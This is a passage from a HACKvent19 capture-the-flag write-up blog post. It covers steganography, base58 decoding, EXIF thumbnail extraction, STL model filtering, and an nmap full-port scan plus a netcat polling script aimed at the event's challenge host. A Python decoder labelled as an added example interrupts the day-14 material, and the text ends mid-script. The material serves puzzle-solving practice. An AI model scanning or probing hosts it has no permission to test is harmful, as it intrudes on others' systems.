{"id":1663,"date":"2020-01-01T10:09:53","date_gmt":"2020-01-01T10:09:53","guid":{"rendered":"https:\/\/devel0pment.de\/?p=1663"},"modified":"2020-01-01T10:09:55","modified_gmt":"2020-01-01T10:09:55","slug":"hackvent19-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=1663","title":{"rendered":"HACKvent19 writeup"},"content":{"rendered":"<p><style>.spanFlag {color:#0000ff;font-weight:bold;}<br \/>\n.chlgTable {border:2px dotted #000000;font-style:italic;margin-top:-10px;}<br \/>\n.chlgTable tr td {padding:10px;}<\/style>\n<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1672\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hv19_logo.png\" alt=\"\" width=\"123\" height=\"132\"><\/td>\n<td>This year&#8217;s <b>HACKvent<\/b> was hosted on the brand new <a href=\"https:\/\/academy.hacking-lab.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Hacking-Lab 2.0<\/a> platform. Each day from the 1st of December until the 24th a new challenge is published, rising in difficulty. The flag format changed from <code>HV18-xxxx-xxxx-xxxx-xxxx-xxxx<\/code> to <code>HV19{...}<\/code>. 
After all I managed to solve all 28 challenges \ud83d\ude42<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table style=\"display: table-cell; vertical-align: top;\">\n<tbody>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1749 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hidden_64.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hidden_64.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hidden_64-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #444444; text-shadow: 1px 1px #000000;\">Hidden<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H1\"><b>HV19.H1<\/b> Hidden One<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H2\"><b>HV19.H2<\/b> Hidden Two<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H3\"><b>HV19.H3<\/b> Hidden Three<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H4\"><b>HV19.H4<\/b> Hidden Four<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1750 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/easy_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/easy_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/easy_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #54af79; text-shadow: 1px 1px #000000;\">Easy<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.01\"><b>HV19.01<\/b> censored<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.02\"><b>HV19.02<\/b> Triangulation<\/a><br><a 
href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.03\"><b>HV19.03<\/b> Hodor, Hodor, Hodor<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.04\"><b>HV19.04<\/b> password policy circumvention<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.05\"><b>HV19.05<\/b> Santa Parcel Tracking<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.06\"><b>HV19.06<\/b> bacon and eggs<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.07\"><b>HV19.07<\/b> Santa Rider<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1751 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/medium_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/medium_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/medium_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #9caf54; text-shadow: 1px 1px #000000;\">Medium<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.08\"><b>HV19.08<\/b> SmileNcryptor 4.0<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.09\"><b>HV19.09<\/b> Santas Quick Response 3.0<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.10\"><b>HV19.10<\/b> Guess what<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.11\"><b>HV19.11<\/b> Frolicsome Santa Jokes API<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.12\"><b>HV19.12<\/b> back to basic<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.13\"><b>HV19.13<\/b> TrieMe<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.14\"><b>HV19.14<\/b> Achtung das Flag<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1752 size-full\" 
src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hard_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hard_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hard_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #af5458; text-shadow: 1px 1px #000000;\">Hard<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.15\"><b>HV19.15<\/b> Santa&#8217;s Workshop<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.16\"><b>HV19.16<\/b> B0rked Calculator<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.17\"><b>HV19.17<\/b> Unicode Portal<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.18\"><b>HV19.18<\/b> Dance with me<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.19\"><b>HV19.19<\/b> U+1F385<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.20\"><b>HV19.20<\/b> i want to play a game<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.21\"><b>HV19.21<\/b> Happy Christmas 256<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1753 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/final_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/final_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/final_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #ff0000; text-shadow: 1px 1px #000000;\">Leet<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.22\"><b>HV19.22<\/b> The command &#8230; is lost<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.23\"><b>HV19.23<\/b> 
Internet Data Archive<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.24\"><b>HV19.24<\/b> ham radio<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><!--more--><\/p>\n\n\n<style>\ncode {\n  font-size:14px;\n  font-weight:bold;\n}\n\n.spanFlag {\n  color:#0000ff;\n  font-weight:bold;\n }\n\n.link {\n  color:#0000ff;\n  text-decoration:underline;\n}\n\n.chlgTable {\n  border:1px solid #000000;\n  font-style:italic;\n  margin-top:-15px;\n  width:100%;\n}\n\n.chlgTable tr td {\n  padding:10px;\n}\n<\/style>\n\n\n\n<hr id=\"chlgHV19.H1\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H1 &#8211; Hidden&nbsp;One<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h1.png\" \/><\/td><td style=\"color:#333333\">Author: hidden<\/td><\/tr><tr><td colspan=\"2\">Sometimes, there are hidden flags. Got your first?<\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge is hidden in the challenge of <a href=\"#chlgHV19.06\">day06<\/a>:\n<br\/><pre>\n<br\/>Born: January 22\t     \t \t   \t   \t \t       \t     \t  \t  \n<br\/>Died: April 9   \t  \t \t    \t  \t      \t   \t\t  \t  \n<br\/>Mother: Lady Anne   \t\t \t   \t   \t      \t  \t      \t  \n<br\/>Father: Sir Nicholas\t \t      \t\t    \t    \t  \t  \t      \t      \n<br\/>Secrets: unknown      \t \t  \t \t    \t    \t   \t       \t  \n<br\/><\/pre>If we inspect the data carefully, we can notice that after each entry there are additional tabs and 
spaces:\n<br\/><pre>\n<br\/>Born:\\x20January\\x2022\\x09\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\n<br\/>Died:\\x20April\\x209\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x09\\x20\\x20\\x09\\x20\\x20\n<br\/>Mother:\\x20Lady\\x20Anne\\x20\\x20\\x20\\x09\\x09\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\n<br\/>Father:\\x20Sir\\x20Nicholas\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\n<br\/>Secrets:\\x20unknown\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\n<br\/><\/pre>After a little bit of googling I stumbled upon <a href=\"http:\/\/manpages.ubuntu.com\/manpages\/bionic\/man1\/stegsnow.1.html\" rel=\"noopener noreferrer\" target=\"_blank\">stegsnow<\/a>:\n<br\/>\n<br\/><i>stegsnow is a program for concealing messages in text files by appending tabs  and  spaces\n<br\/>on  the  end  of lines, and for extracting messages from files containing hidden messages.\n<br\/>Tabs and spaces are invisible to most text viewers, hence  the  steganographic  nature  of\n<br\/>this encoding scheme.<\/i>\n<br\/>\n<br\/>By copy&#038;pasting the contents of the box (click on the icon in the upper right corner) to a file, we can easily extract the hidden flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden01# stegsnow -C hidden.txt 
\nHV19{1stHiddenFound}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{1stHiddenFound}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.H2\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H2 &#8211; Hidden&nbsp;Two<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h2.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">Again a hidden flag.<\/td><\/tr><\/tbody><\/table>\n<br\/>The flag is hidden in the name of the <code>.mp4<\/code> file from the challenge of <a href=\"#chlgHV19.07\">day07<\/a>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# unzip 3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\nArchive:  3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\n  inflating: 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4<\/pre>  \n<br\/>The <code>Magic<\/code> tool of <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> quickly reveals that the filename contains the base58-encoded flag:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/h1_01_cyberchef.png\" width=\"800px\"\/>\n<br\/>\n<br\/>Of course this can also be done using python:<pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# pip install base58\n...\nroot@kali:~\/hv19\/07# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n[GCC 8.3.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n&gt;&gt;&gt; import base58\n&gt;&gt;&gt; base58.b58decode('3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v')\n'HV19{Dont_confuse_0_and_O}'<\/pre>\n<br\/>The flag is <span 
class=\"spanFlag\">HV19{Dont_confuse_0_and_O}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.H3\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H3 &#8211; Hidden&nbsp;Three<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h3.png\" \/><\/td><td style=\"color:#333333\">Author: M. \/ inik<\/td><\/tr><tr><td colspan=\"2\">Not each quote is compl<\/td><\/tr><\/tbody><\/table>\n<br\/>Since the challenge is in the category <code>Penetration Testing<\/code>, let&#8217;s run a full port scan (<code>-p-<\/code>) with nmap against the <code>whale.hacking-lab.com<\/code> host:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# nmap whale.hacking-lab.com -p-\nNmap scan report for urb80-74-140-188.ch-meta.net (80.74.140.188)\nHost is up (2.2s latency).\nNot shown: 65527 filtered ports\nPORT      STATE  SERVICE\n17\/tcp    open   qotd\n22\/tcp    open   ssh\n80\/tcp    closed http\n443\/tcp   closed https\n2222\/tcp  closed EtherNetIP-1\n4444\/tcp  closed krb524\n5555\/tcp  closed freeciv\n10101\/tcp open   ezmeeting-2\n\nNmap done: 1 IP address (1 host up) scanned in 3504.09 seconds\n<\/pre>\n<br\/>The open <code>tcp port 17<\/code> stands out. The service registered on this port is <a href=\"https:\/\/en.wikipedia.org\/wiki\/QOTD\" rel=\"noopener noreferrer\" target=\"_blank\">Quote of the Day (QOTD)<\/a>, which fits the challenge description perfectly. The protocol is simple: accept a TCP connection, send a quote, close the connection. 
So let&#8217;s have a look using <code>netcat<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# nc -v whale.hacking-lab.com 17\nConnection to whale.hacking-lab.com 17 port [tcp\/qotd] succeeded!\nr<\/pre>\n<br\/>The server only echoed the letter <code>r<\/code>. After trying different approaches I noticed, roughly an hour later, that the server now returns the letter <code>_<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# nc -v whale.hacking-lab.com 17\nConnection to whale.hacking-lab.com 17 port [tcp\/qotd] succeeded!\n_<\/pre>\n<br\/>So this appears to be the flag, echoed back by the server very slowly (one letter per hour). All we need is a small bash script that fetches the current letter every hour (I set the interval to 10 minutes to be safe, so every letter shows up several times in the log) and then wait &#8230; :\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# cat quote.sh \n#!\/bin\/bash\n\n# poll the QOTD port every 10 minutes and log each answer with a timestamp\nwhile true; do\n  (date;echo|nc 80.74.140.188 17) | tee -a flag.txt\n  sleep 600\ndone;<\/pre>\n<br\/>After one day we finally have the full flag (the repeated letters in <code>flag.txt<\/code> just have to be collapsed).\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{an0ther_DAILY_fl4g}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.H4\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H4 &#8211; Hidden&nbsp;Four<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h4.png\" \/><\/td><td style=\"color:#333333\">Author: M.<\/td><\/tr><tr><td colspan=\"2\">No description.<\/td><\/tr><\/tbody><\/table>\n<br\/>The flag is hidden in the flag of <a href=\"#chlgHV19.14\">day14<\/a>. 
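The day-14 flag is itself a Perl one-liner. As an added example that is not part of the original writeup, here is its three-step pipeline ported to Python so that each step can be checked on its own: `s@@jSfx4gPcvtiwxPCagrtQ@` seeds `$_` with the ciphertext; `y^p-za-oPQ^a-z\x20\n^` is a `tr///` that maps `p-z`, `a-o`, `P` and `Q` onto `a-z`, space and newline; `s[(.)(..)][\2\1]g` moves the first character of every three-character window behind the other two; and `s%4(...)%"p$1t"%ee` evaluates its replacement twice, so the match `4rin` becomes the Perl builtin `print`, which prints `$_` as it stands at that moment. The function and constant names are mine.

```python
import re

# The string the one-liner seeds $_ with (taken from the day-14 flag).
CIPHERTEXT = "jSfx4gPcvtiwxPCagrtQ"

# y^p-za-oPQ^a-z\x20\n^  ->  tr table: p..z, a..o, P, Q  =>  a..z, ' ', '\n'
_SRC = "pqrstuvwxyz" + "abcdefghijklmno" + "PQ"
_DST = "abcdefghijklmnopqrstuvwxyz" + " \n"
TR_TABLE = str.maketrans(_SRC, _DST)


def transliterate(s: str) -> str:
    """Step 1: apply the y/// table; characters outside the table stay as they are."""
    return s.translate(TR_TABLE)


def swap_groups(s: str) -> str:
    """Step 2: s[(.)(..)][\\2\\1]g - in every 3-char window move the first char last.
    As in Perl, '.' does not match a newline, so a trailing 'e\\n' is left alone."""
    return re.sub(r"(.)(..)", r"\2\1", s)


def final_substitution_prints(s: str) -> bool:
    """Step 3: s%4(...)%"p$1t"%ee builds 'p' + $1 + 't' and evals it as Perl code.
    Only when that code is 'print' does anything get written to stdout, and what
    is printed is $_ before the substitution is applied."""
    m = re.search(r"4(...)", s)
    return m is not None and "p" + m.group(1) + "t" == "print"


def decode(cipher: str = CIPHERTEXT) -> str:
    """Return exactly what the one-liner prints ('' if the final eval would not print)."""
    plain = swap_groups(transliterate(cipher))
    return plain if final_substitution_prints(plain) else ""


if __name__ == "__main__":
    print(decode(), end="")  # the trailing newline comes from Q -> '\n'
```

Running the block prints the same `Squ4ring the Circle` as the Perl version. The Perl original, of course, needs none of this analysis to yield the flag.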
It simply has to be run with perl:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden04# cat flag_14.pl\ns@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\\x20\\n^&&s[(.)(..)][\\2\\1]g;s%4(...)%\"p$1t\"%ee\nroot@kali:~\/hv19\/hidden04# perl flag_14.pl\nSqu4ring the Circle<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Squ4ring the Circle}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.01\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.01 &#8211; censored<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_01.png\" \/><\/td><td style=\"color:#333333\">Author: M<\/td><\/tr><tr><td colspan=\"2\">I got this little image, but it looks like the best part got censored on the way. Even the tiny preview icon looks clearer than this! Maybe they missed something that would let you restore the original content?<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/01_01_ball.jpg\" \/><\/td><\/tr><\/tbody><\/table>\n<br\/>The first challenge of this year provides an image of a blurred QR code as well as the hint that <i>the tiny preview icon looks clearer than this<\/i>.\n<br\/>\n<br\/>Running <code>exiftool<\/code> on the image reveals that the file actually contains an embedded thumbnail image:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/01# exiftool f182d5f0-1d10-4f0f-a0c1-7cba0981b6da.jpg\nExifTool Version Number         : 11.16\nFile Name                       : f182d5f0-1d10-4f0f-a0c1-7cba0981b6da.jpg\n...\nThumbnail Image                 : (Binary data 5336 bytes, use -b option to extract)<\/pre>\n<br\/>The thumbnail image can be extracted using the <code>-b<\/code> option of 
<code>exiftool<\/code> and additionally providing <code>-ThumbnailImage<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/01# exiftool -b -ThumbnailImage f182d5f0-1d10-4f0f-a0c1-7cba0981b6da.jpg &gt; thumbnail.jpg<\/pre>\n<br\/>The extracted thumbnail looks like this:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/01_02_thumbnail.jpg\" \/>\n<br\/>\n<br\/>In order to be able to scan the QR code, we should delete the christmas tree ball around the QR code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/01_03_thumbnail_edited.jpg\" \/>\n<br\/>\n<br\/>Now the QR code can be scanned eg. using <code>zbarimg<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/01# zbarimg thumbnail_edited.jpg\nQR-Code:HV19{just-4-PREview!}\nscanned 1 barcode symbols from 1 images in 0.03 seconds<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{just-4-PREview!}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.02\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.02 &#8211; Triangulation<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_02.png\" \/><\/td><td style=\"color:#333333\">Author: drschottky<\/td><\/tr><tr><td colspan=\"2\">Today we give away decorations for your Christmas tree. 
But be careful and do not break it.\n<br\/>\n<br\/><span class=\"link\">HV19.02-Triangulation.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge provides a zip file, which contains an <code>stl<\/code> file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# unzip a5f47ab8-f151-4741-b061-d2ab331bf641.zip \nArchive:  a5f47ab8-f151-4741-b061-d2ab331bf641.zip\n  inflating: Triangulation.stl<\/pre>\n<br\/><code>stl<\/code> files can be represented in both ASCII and binary. In this case we are dealing with a binary file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# file Triangulation.stl\nTriangulation.stl: data\nroot@kali:~\/hv19\/02# hexdump -C Triangulation.stl | head\n00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n*\n00000050  58 20 00 00 61 d9 9b 3e  81 9b 65 bf f7 3e a4 be  |X ..a..&gt;..e..&gt;..|\n00000060  c5 20 38 41 74 dc 15 40  81 95 13 42 3d 0a 37 41  |. 
8At..@...B=.7A|\n00000070  57 3d 13 40 b4 c8 13 42  06 81 13 41 cb a1 e5 3f  |W=.@...B...A...?|\n00000080  1f 05 11 42 00 00 fe eb  71 3f c0 33 7e 3d 27 68  |...B....q?.3~='h|\n00000090  a4 3e a8 c6 d0 41 00 00  d0 41 8d 17 5b 42 27 31  |.&gt;...A...A..[B'1|\n000000a0  d9 41 00 00 d0 41 3f b5  4e 42 37 89 d7 41 4c 37  |.A...A?.NB7..AL7|\n000000b0  e9 41 3f b5 4e 42 00 00  31 a6 f8 3e 00 00 00 00  |.A?.NB..1..&gt;....|\n000000c0  c5 c8 5f 3f 66 66 3a 41  a6 af 85 40 77 3e 13 42  |.._?ff:A...@w&gt;.B|<\/pre>\n<br\/>In order to process the file more easily, let&#8217;s convert it to ASCII using <a href=\"https:\/\/github.com\/cmpolis\/convertSTL\" rel=\"noopener noreferrer\" target=\"_blank\">convertSTL<\/a>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# git clone https:\/\/github.com\/cmpolis\/convertSTL\nCloning into 'convertSTL'...\nremote: Enumerating objects: 10, done.\nremote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10\nUnpacking objects: 100% (10\/10), done.\nroot@kali:~\/hv19\/02# .\/convertSTL\/convertSTL.rb Triangulation.stl\nTriangulation.stl is in BINARY format, converting to ASCII: Triangulation-ascii.stl<\/pre>\n<br\/>Now the content can be read a little bit more easily:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# head -n 20 Triangulation-ascii.stl \nsolid \n  facet normal 3.043928E-01 -8.969041E-01 -3.207929E-01\n    outer loop\n      vertex 1.150800E+01 2.341580E+00 3.689600E+01\n      vertex 1.144000E+01 2.300619E+00 3.694600E+01\n      vertex 9.219000E+00 1.794000E+00 3.625500E+01\n    endloop\n  endfacet\n  facet normal 9.450072E-01 6.206107E-02 3.211071E-01\n    outer loop\n      vertex 2.609700E+01 2.600000E+01 5.477300E+01\n      vertex 2.714900E+01 2.600000E+01 5.167700E+01\n      vertex 2.694200E+01 2.915200E+01 5.167700E+01\n 
   endloop\n  endfacet\n  facet normal 4.856429E-01 0.000000E+00 8.741572E-01\n    outer loop\n      vertex 1.165000E+01 4.177691E+00 3.681100E+01\n      vertex 1.157800E+01 4.138959E+00 3.685100E+01\n      vertex 1.165000E+01 2.420174E+00 3.681100E+01<\/pre>\n<br\/>The file defines triangles (facets), each consisting of three vertices and a facet normal. The resulting 3D model can for example be viewed using an online viewer like <a href=\"https:\/\/www.viewstl.com\/\" rel=\"noopener noreferrer\" target=\"_blank\">www.viewstl.com<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_01_ball.png\" \/>\n<br\/>\n<br\/>When switching the display option to <code>Wireframe<\/code>, we can see that inside the christmas tree ball there seems to be the QR code we are looking for:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_02_ball_wireframe.png\" \/>\n<br\/>\n<br\/>After filtering out different sets of triangles and inspecting the resulting model, it turned out that the QR code shows up quite well if we keep only the triangles with a facet normal of <code>0.0 0.0 -1.0<\/code> (the faces pointing in the negative z direction):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\n# keep only the facets whose normal is (0, 0, -1); in an ASCII STL each facet\n# block spans 7 lines: facet normal, outer loop, 3x vertex, endloop, endfacet\nlines = open('Triangulation-ascii.stl').read().split('\\n')\n\nprint('solid')\nfor i in range(len(lines)):\n  line = lines[i]\n  if ('facet normal 0.000000E+00 0.000000E+00 -1.000000E+00' in line):\n      